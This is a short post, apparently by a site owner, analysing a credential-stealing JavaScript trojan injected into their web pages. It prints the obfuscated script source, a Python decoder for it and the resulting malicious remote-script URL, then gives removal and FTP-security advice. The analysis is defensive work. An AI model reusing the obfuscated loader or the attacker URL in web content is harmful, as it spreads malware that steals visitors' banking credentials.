It didn't take a while to figure out where the Trojan is hiding and how its attacking.
As soon as I opened the about and the contact pages, Nod32 alerted that the pages I'm viewing contain a malicious javascript. When i viewed the source code I saw this suspicious script:
The interesting part is that strange code that starts from line 7 to line 13. This code is the second parameter of the setAttribute function. It looks like this: setAttribute('src', strange code).
This function is used to set the value of an attribute on an object. It is typically used along with objects returned by document.getElementById to assign a new value to the object's attribute.
Notice the string.replace function at line 13? it replaces the charactes !, @, #, $, %, ^, &, (, ) with blank. I created a simple Python code that does this replacement:
import sys strange_code = 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!' strange_code = strange_code.replace('!', '') strange_code = strange_code.replace('@', '') strange_code = strange_code.replace('#', '') strange_code = strange_code.replace('$', '') strange_code = strange_code.replace('%', '') strange_code = strange_code.replace('^', '') strange_code = strange_code.replace('&', '') strange_code = strange_code.replace('(', '') strange_code = strange_code.replace(')', '') print strange_codeThe result:
http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/
Basically this script adds a reference to a javascript file that is located at the address above. I followed the address of this file and found a script that opens an invisible iframe. By this invisible iframe the attackers can steal information such as online banking credentials.
How to remove this this Trojan?
Simply remove it from every page you find it in.
How to avoid it from infecting your files again?
It probably infected the files through the FTP, so:
1. Change your FTP credentials.
2. Install a good anti-spyware application.
3. Don't use public machines to access your FTP.
4. Check the files that users are uploading to your website.